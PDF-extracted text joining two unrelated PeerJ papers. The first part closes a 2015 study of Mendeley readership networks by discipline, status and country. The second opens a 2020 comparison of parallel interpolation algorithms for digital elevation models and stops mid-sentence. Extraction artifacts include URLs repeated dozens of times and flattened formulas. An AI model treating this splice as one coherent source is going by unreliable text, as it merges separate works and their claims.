information: their (1) disciplinary affiliation (2) professional status, and (3) country. All three information sources can be used to produce meaningful network results. In terms of disciplines, first, we found four groups: (1) biology, (2) social science and humanities (including relevant computer science), (3) bio-medical sciences, and (4) natural science and engineering. In all four groups, the category with the addition “miscellaneous” prevails. Probably, the readers who identify themselves with cross-disciplinary research interests are more inclined to generate these “bookmark couplings” than more specifically specialized readers. The pronounced position of the social sciences and the humanities was not expected. Some sub-disciplines, e.g., “Judaism” and “Catholicism”, are disconnected from the other sub-disciplines. The decomposition in terms of status hierarchies within the network makes clear that this hierarchy is inversed in Mendeley. The lead among the users is taken by students working on theses. More than professionals, students have time to explore the literature beyond their specialization. Lecturers and Senior Lecturers entertain a different reading pattern, given their primary tasks in education. Librarians make use of Mendeley (and scholarly literature) differently from researchers. Students—having the highest absolute number of reader counts—also have the highest eigenvector centrality in the network which indicates that they have a strong bookmark coupling when compared with other status groups (e.g., Lecturer or Librarian). The calculated eigenvector centralities correlate strongly with the absolute number of observed reader counts. The decomposition in terms of nations highlights the worldwide divide between developed and less-developed nations. A similar prevailing divide was recently also found in portfolio analysis of journal literature by Leydesdorff, Heimeriks & Rotolo (in press). More fine-grained delineations can partially be recognized as regional, but could not always be provided with an obvious interpretation. The academic status information is provided by every Mendeley user and nearly every Mendeley user provides (sub-) discipline information. Surprisingly, the vast majority of Mendeley readers assign the miscellaneous sub-discipline of their main discipline to themselves. Only a minority of Mendeley users seems to provide their location. This makes it more difficult to analyze the reader counts broken down by countries. Some Mendeley academic status groups seem redundant (e.g., Doctoral student and Student PhD), while others seem to be tailored to the British (e.g., Lecturer and Senior lecturer) or the US system (e.g., Assistant professor and Associate professor). It is not clear to which extent Mendeley users assign the precise sub-discipline, status, and location information to themselves and whether they update this information regularly. Despite these shortcomings of the Mendeley classification system and the quality of information the users provide, the network analyses of Mendeley reader counts from three different perspectives produced interesting insights in readership patterns. This shows that useful network analysis can be performed using Mendeley readership counts. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 12/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.32 CONCLUSIONS In this study, we analyzed Mendeley readership data of a set of 1,074,407 articles and 62,771 reviews with publication year 2012 to generate three different networks: (1) The network based on disciplinary affiliations of Mendeley readers contains four groups: (i) biology, (ii) social sciences and humanities (including relevant computer sciences), (iii) bio-medical sciences, and (iv) natural sciences and engineering. In all four groups, the category with the addition “miscellaneous” prevails. (2) The network of co-readers in terms of professional status shows that Mendeley is mainly shared among PhD students, Master’s students, and postdocs. (3) The country network focusses on global readership patterns: it identifies a group of 53 nations that are core to the scientific enterprise, including two thirds of the OECD countries as well as Russia and China. ACKNOWLEDGEMENTS The bibliometric data used in this paper are from an in-house database developed and maintained by the Max Planck Digital Library (MPDL, Munich) and derived from the Science Citation Index Expanded (SCI-E), Social Sciences Citation Index (SSCI), Arts and Humanities Citation Index (AHCI) provided by Thomson Reuters (Philadelphia, Pennsylvania, USA). ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Loet Leydesdorff is an Academic Editor for PeerJ Computer Science. Author Contributions • Robin Haunschild conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Lutz Bornmann conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • Loet Leydesdorff analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: This paper was available on the arXiv in a previous version. arXiv: http://arxiv.org/abs/1504.07482. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 13/15 https://peerj.com/computer-science/ http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://arxiv.org/abs/1504.07482 http://dx.doi.org/10.7717/peerj-cs.32 REFERENCES Blondel VD, Guillaume JL, Lambiotte R, Lefebvre E. 2008. Fast unfolding of communities in large networks. Journal of Statistical Mechanics—Theory and Experiment 2008:P10008 DOI 10.1088/1742-5468/2008/10/P10008. Bonacich P. 1972. Factoring and weighting approaches to status scores and clique identification. Journal of Mathematical Sociology 2(1):113–120 DOI 10.1080/0022250X.1972.9989806. Börner K, Sanyal S, Vespignani A. 2007. Network science. Annual Review of Information Science and Technology 41(1):537–607 DOI 10.1002/aris.2007.1440410119. Bornmann L. 2014. Do altmetrics point to the broader impact of research? An overview of benefits and disadvantages of altmetrics. Journal of Informetrics 8(4):895–903 DOI 10.1016/j.joi.2014.09.005. Bornmann L. 2015. Alternative metrics in scientometrics: a meta-analysis of research into three altmetrics. Scientometrics 103(3):1123–1144 DOI 10.1007/s11192-015-1565-y. Bornmann L, Haunschild R. 2015. Which people use which scientific papers? An evaluation of data from F1000 and Mendeley. Journal of Informetrics 9(3):477–487 DOI 10.1016/j.joi.2015.04.001. De Nooy W, Mrvar A, Batagelj V. 2011. Exploratory social network analysis with Pajek. New York: Cambridge University Press. Gunn W. 2014. Mendeley: enabling and understanding scientific collaboration. Information Services and Use 34(1):99–102 DOI 10.3233/ISU-140738. Haunschild R, Bornmann L. 2015. F1000Prime: an analysis of discipline-specific reader data from Mendeley [version 2; referees: 1 approved with reservations, 1 not approved]. F1000Research 4:41 DOI 10.12688/f1000research.6062.2. Haustein S, Larivière V. 2014a. Mendeley as a source of readership by students and postdocs? Evaluating article usage by academic status. In: Paper presented at the proceedings of the IATUL conferences. Paper 2. Haustein S, Larivière V. 2014b. A multidimensional analysis of Aslib proceedings—using everything but the impact factor. Aslib Journal of Information Management 66(4):358–380 DOI 10.1108/AJIM-11-2013-0127. Jeng W, He DQ, Jiang JP. 2015. User participation in an academic social networking service: a survey of open group users on Mendeley. Journal of the Association for Information Science and Technology 66(5):890–904 DOI 10.1002/asi.23225. Kessler MM. 1963. Bibliographic coupling between scientific papers. American Documentation 14(1):10–25 DOI 10.1002/asi.5090140103. Kraker P, Schlögl C, Jack K, Lindstaedt S. 2014. Visualization of co-readership patterns from an online reference management system. ArXiv preprint. arXiv:1409.0348. Leydesdorff L. 2014. Science visualization and discursive knowledge. In: Cronin B, Sugimoto C, eds. Beyond bibliometrics: harnessing multidimensional indicators of scholarly impact. Cambridge: MIT Press, 167–185. Leydesdorff L, Heimeriks G, Rotolo D. 2015. Journal portfolio analysis for countries, cities, and organizations: maps and comparisons. Journal of the Association for Information Science and Technology In Press. Maflahi N, Thelwall M. 2015. When are readership counts as useful as citation counts? Scopus versus Mendeley for LIS journals. Journal of the Association for Information Science and Technology In Press. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 14/15 https://peerj.com/computer-science/ http://dx.doi.org/10.1088/1742-5468/2008/10/P10008 http://dx.doi.org/10.1080/0022250X.1972.9989806 http://dx.doi.org/10.1002/aris.2007.1440410119 http://dx.doi.org/10.1016/j.joi.2014.09.005 http://dx.doi.org/10.1007/s11192-015-1565-y http://dx.doi.org/10.1016/j.joi.2015.04.001 http://dx.doi.org/10.3233/ISU-140738 http://dx.doi.org/10.12688/f1000research.6062.2 http://dx.doi.org/10.1108/AJIM-11-2013-0127 http://dx.doi.org/10.1002/asi.23225 http://dx.doi.org/10.1002/asi.5090140103 http://arxiv.org/abs/1409.0348 http://dx.doi.org/10.7717/peerj-cs.32 Martin B, Nightingale P, Rafols I. 2014. Response to the call for evidence to the independent review of the role of metrics in research assessment. Available at https://www.sussex.ac.uk/ webteam/gateway/file.php?name=spru-response-final.pdf&site=25. Milojević S. 2014. Network analysis and indicators. In: Ding Y, Rousseau R, Wolfram D, eds. Measuring scholarly impact. Switzerland: Springer International Publishing, 57–82 DOI 10.1007/978-3-319-10377-8 3. Mingers J, Leydesdorff L. 2015. A review of theory and practice in scientometrics. European Journal of Operational Research 246(1):1–19 DOI 10.1016/j.ejor.2015.04.002. Mohammadi E, Thelwall M. 2013. Assessing the Mendeley readership of social science and humanities research. In: Gorraiz J, Schiebel E, Gumpenberger C, Ho M, eds. Proceedings of ISSI 2013 Vienna: 14th international society of scientometrics and informetrics conference. Vienna: Austrian Institute of Technology GmbH, 200–214. Mohammadi E, Thelwall M. 2014. Mendeley readership altmetrics for the social sciences and humanities: research evaluation and knowledge flows. Journal of the Association for Information Science and Technology 65(8):1627–1638 DOI 10.1002/asi.23071. Mohammadi E, Thelwall M, Haustein S, Larivière V. 2015. Who reads research articles? An altmetrics analysis of Mendeley user categories. Journal of the Association for Information Science and Technology 66(9):1832–1846 DOI 10.1002/asi.23286. Sud P, Thelwall M. 2015. Not all international collaboration is beneficial: the Mendeley readership and citation impact of biochemical research collaboration. Journal of the Association for Information Science and Technology In Press. Van Eck JN, Waltman L. 2014. Visualizing bibliometric networks. In: Ding Y, Rousseau R, Wolfram D, eds. Measuring scholarly impact. Switzerland: Springer International Publishing, 285–320 DOI 10.1007/978-3-319-10377-8 13. Zahedi Z, Costas R, Wouters P. 2014. Assessing the impact of publications saved by mendeley users: is there any different pattern among users? In: Proceedings of the IATUL conferences. Paper 4. Available at http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 (accessed 10 September 2014). Zahedi Z, Van Eck NJ. 2014. Visualizing readership activity of Mendeley users using VOSviewer. figshare DOI 10.6084/m9.figshare.1041819. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 15/15 https://peerj.com/computer-science/ https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site=25 http://dx.doi.org/10.1007/978-3-319-10377-8_3 http://dx.doi.org/10.1016/j.ejor.2015.04.002 http://dx.doi.org/10.1002/asi.23071 http://dx.doi.org/10.1002/asi.23286 http://dx.doi.org/10.1007/978-3-319-10377-8_13 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://docs.lib.purdue.edu/iatul/2014/altmetrics/4 http://dx.doi.org/10.6084/m9.figshare.1041819 http://dx.doi.org/10.7717/peerj-cs.32 Networks of reader and country status: an analysis of Mendeley reader statistics Introduction Methods Dataset used Software and statistics Results Statistical parameters Disciplinary affiliations Status hierarchy Decomposition in terms of nations Discussion Conclusions Acknowledgements References work_jmqylozdgrfyrjbdgrrfrh5pmm ---- Submitted 12 August 2019 Accepted 10 February 2020 Published 2 March 2020 Corresponding authors Guoxiang Yang, yanggx@cugb.edu.cn Gang Mei, gang.mei@cugb.edu.cn Academic editor Stefan Steiniger Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.263 Copyright 2020 Tu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Comparative investigation of parallel spatial interpolation algorithms for building large-scale digital elevation models Jingzhi Tu, Guoxiang Yang, Pian Qi, Zengyu Ding and Gang Mei School of Engineering and Technology, China University of Geoscience (Beijing), Beijing, China ABSTRACT The building of large-scale Digital Elevation Models (DEMs) using various interpola- tion algorithms is one of the key issues in geographic information science. Different choices of interpolation algorithms may trigger significant differences in interpolation accuracy and computational efficiency, and a proper interpolation algorithm needs to be carefully used based on the specific characteristics of the scene of interpolation. In this paper, we comparatively investigate the performance of parallel Radial Basis Function (RBF)-based, Moving Least Square (MLS)-based, and Shepard’s interpolation algorithms for building DEMs by evaluating the influence of terrain type, raw data density, and distribution patterns on the interpolation accuracy and computational efficiency. The drawn conclusions may help select a suitable interpolation algorithm in a specific scene to build large-scale DEMs. Subjects Distributed and Parallel Computing, Spatial and Geographic Information Systems Keywords Digital elevation model (DEM), Spatial interpolation, Radial basis function (RBF), Moving least square (MLS), Parallel algorithm, Graphics processing unit (GPU), Geographic information system(GIS) INTRODUCTION Digital Elevation Model (DEM) is a numerical representation of topography made up of equal-sized grid cells, each with a value of elevation. One of the most important scientific challenges of digital elevation modeling is the inefficiency of most interpolation algorithms in dealing with a large amount of data produced by large-scale DEM with a fine resolution. To solve the problem, one of the common strategies is to parallelize interpolation algorithms on various High Performance Computing (HPC) platforms. For different large-scale DEM, different parallel spatial interpolation algorithms are usually specifically selected, because a variety of spatial interpolation algorithms exist that behave differently for different data configurations and landscape conditions. Consequently, the accuracy of a DEM is sensitive to the interpolation technique, and it is significant to understand how the various algorithms affect a DEM. Therefore, this study is being conducted. Spatial interpolation is a category of important algorithms in the field of geographic information. Siu-Nganlam (1983) had a review of various interpolation algorithms, How to cite this article Tu J, Yang G, Qi P, Ding Z, Mei G. 2020. Comparative investigation of parallel spatial interpolation algorithms for building large-scale digital elevation models. PeerJ Comput. Sci. 6:e263 http://doi.org/10.7717/peerj-cs.263 https://peerj.com/computer-science mailto:yanggx@cugb.edu.cn mailto:gang.mei@cugb.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.263 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.263 including most distance-weighting methods, Kriging, spline interpolation, interpolating polynomials, finite-difference methods, power-series trend models, Fourier models, distance-weighted least-squares, and least-squares fitting with splines. Many spatial interpolation algorithms are used to build DEMs, for example, the Shepard’s method (IDW) (Shepard, 1968), the Kriging method (Krige, 1953), the Discrete Smoothing Interpolation (DSI) method (Mallet, 1997), the Radial Basis Function (RBF)-based method (Powell, 1977), and the Moving Least Squares (MLS)-based method (Lancaster & Salkauskas, 1981). Much research work (Gumus & Sen, 2013; Chaplot et al., 2006; Aguilar et al., 2005; Khairnar et al., 2015; Polat, Uysal & Toprak, 2015; Rishikeshan et al., 2014) has been conducted to evaluate the effects of different interpolation methods on the precision of DEM interpolation. In the comparative investigation of spatial interpolation algorithms for building DEMs, quite a few studies specifically focused on the impact of data samples and terrain types on interpolation accuracy; among them, Gumus & Sen (2013) compared the accuracy of various interpolation methods at different point distributions, the interpolation performance of IDW is worse than other algorithms for the same data distribution. For the same algorithm, in the case of using all points and grid, their experimental results show that the best interpolation performances are Modified Shepard’s (MS) for random distribution; Multiquadric Radial Basis Function (MRBF) for curvature distribution, and Inverse Distance Weighted (IDW) for uniform distribution. Chaplot et al. (2006) and Aguilar et al. (2005) evaluated the effects of landform types and the density of the original data on the accuracy of DEM production, their results show that interpolation algorithms perform well at higher sampling densities, and MRBF provided significantly better interpolation than IDW in rough or non-uniform terrain. At lower sampling densities, when the spatial structure of height was strong, Kriging yielded better estimates. When the spatial structure of height was weak, IDW and Regularized Spline with Tension (RST) performed better. On the other hand, MRBF performed well in the mountainous areas and Ordinary Kriging (OK) was the best for multi-scales interpolations in the smooth landscape. In addition, Zhang (2013) established a descriptive model of local terrain features to study the correlation of surface roughness indicators and spatial distribution indicators for DEM interpolation algorithms. (Chaplot et al., 2006). Ghandehari, Buttenfield & Farmer (2019) illustrated that the Bi-quadratic and Bi- cubic interpolation methods outperform Weighted Average, Linear, and Bi-linear methods at coarse resolutions and in rough or non-uniform terrain. Aguilar et al. (2005) pointed out that MRBF is better than Multilog function for low sample densities and steeper terrain. With the increasing size of DEMs, it is increasingly necessary to design parallel solutions for existing sequential algorithms to speed up processing. When adopting an interpolation method to deal with a large DEM, the computational cost would be quite expensive, and the computational efficiency would especially be unsatisfied. The techniques in HPC are widely used to improve computational efficiency in various science and engineering applications such as surface modeling (Yan et al., 2016), spatial point pattern analysis (Zhang, Zhu & Huang, 2017), urban growth simulation (Guan et al., 2016), Delaunay Triangulation (DT) for GIS (Coll & Guerrieri, 2017), spatial Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 2/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 interpolation (Wang, Guan & Wu, 2017; Cheng, 2013; Mei, 2014; Mei, Xu & Xu, 2017; Mei, 2014; Mei, Xu & Xu, 2016; Ding et al., 2018b), and image processing (Wasza et al., 2011; Lei et al., 2011; Yin et al., 2014; Wu, Deng & Jeon, 2018). One of the effective strategies to solve the problem is to perform the DEM interpolation in parallel on various parallel computing platforms such as shared-memory computers, distributed-memory computers, or even clusters. The parallelization of DEM interpolation can be developed with the computational power of modern multicore Central Processing Units (CPUs) and many-core Graphics Processing Units (GPUs). For example, Zhou et al. (2017) proposed a parallel Open Multi-Processing (OpenMP)- and Message Passing Interface (MPI)-based implementation of the Priority-Flood algorithm that identifies and fills depressions in raster DEMs. Yan et al. (2015) accelerated high-accuracy surface modeling (HASM) in constructing large-scale and fine resolution DEM surfaces by the use of GPUs and applied this acceleration algorithm to simulations of both ideal Gaussian synthetic surfaces and real topographic surfaces in the loess plateau of Gansu province. Tan et al. (2017) presented a novel method to generate contour lines from grid DEM data, based on the programmable GPU pipeline, that can be easily integrated into a 3D GIS system. Chen et al. (2010) demonstrated a new algorithm for reconstructing contour maps from raster DEM data for digital-earth and other terrain platforms in real-time entirely based on modern GPUs and programmable pipelines. The RBF, Kriging, MLS and Shepard’s interpolation algorithms are the most frequently used spatial interpolation algorithms, among which, the Kriging method can be regarded as an instance of RBF framework (Peng et al., 2019). Therefore, in this paper, we comparatively investigate the performance of the RBF-based, MLS-based, and Shepard’s interpolation algorithms for building DEMs by evaluating the influence of terrain type, raw data density, and distribution patterns on the interpolation accuracy and computational efficiency. The rest of the paper is organized as follows. ‘Background’ briefly introduces the basic principles of eight interpolation methods. ‘Methods’ concentrates mainly on our parallel implementations of the eight interpolation methods and creation of the testing data. ‘Results’ introduces some of the experimental tests performed on the CPU and GPU. ‘Discussion’ discusses the experimental results. Finally, ‘Conclusion’ states conclusions from the work. BACKGROUND In this section, we briefly introduce eight spatial interpolation algorithms. MLS-based Interpolation Algorithms The MLS method obtains the fitting surface by solving the equation group derived from minimizing the sum of the squares of the errors between the fitting data and the given node data. Original MLS Interpolation Algorithm The MLS approximation is used to approximate field variables and their derivatives. In a domain �, the MLS approximation f h(x) of the field variable f (x) in the vicinity of a Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 3/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 point x̄ is given as f h(x)= m∑ j=1 pj(x)·aj(x̄)=P T (x)·a(x̄) (1) where pj(x),j =1 ,2,...,m is a complete basis function with coefficients aj(x̄). At each point x̄, aj(x̄) is chosen to minimize the weighted residual L2− norm (L2− norm refers to ‖x‖2, where x =[x1,x2,...,xn] T , and ‖x‖2= √( |x1|2+|x2|2+|x3|2+···+|xn|2 ) ): J = N∑ I=1 w(x̄−xI) [ PT (xI)a(x̄)−fI ]2 (2) where N is the number of nodes in the compact-supported neighborhood of x̄ and fI refers to the nodal parameter of f at x =xI . Nodes refer to data points in the compact-supported neighborhood of x̄. Compact-supported, i.e., point x̄ is only related to the nodes of its neighborhood, xI is one of the nodes in the compact-supported 